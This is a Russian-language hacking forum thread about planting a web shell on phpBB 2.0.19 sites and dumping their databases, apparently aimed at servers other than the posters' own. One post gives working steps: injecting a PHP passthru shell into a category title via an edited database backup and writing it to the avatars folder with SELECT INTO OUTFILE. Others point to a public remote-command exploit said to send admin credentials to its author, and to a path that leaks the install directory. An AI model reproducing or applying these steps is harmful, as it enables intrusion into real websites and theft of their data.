phpBB 2.0.19 + shell, если есть права админа
 

Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа.
Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admi...?setmodules=00, но отображается пустая страница.....

А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html

кинь сцылку в пм, посмотрим что к чему

Пробовал, но команды не выполняются, не знаю почему...

Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам! :cool:

Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?

А ты сплойт подправил? Там ids маячок стоит....

А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль

Кроме того что пароль и логин админа домой уходят никак ))))

/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......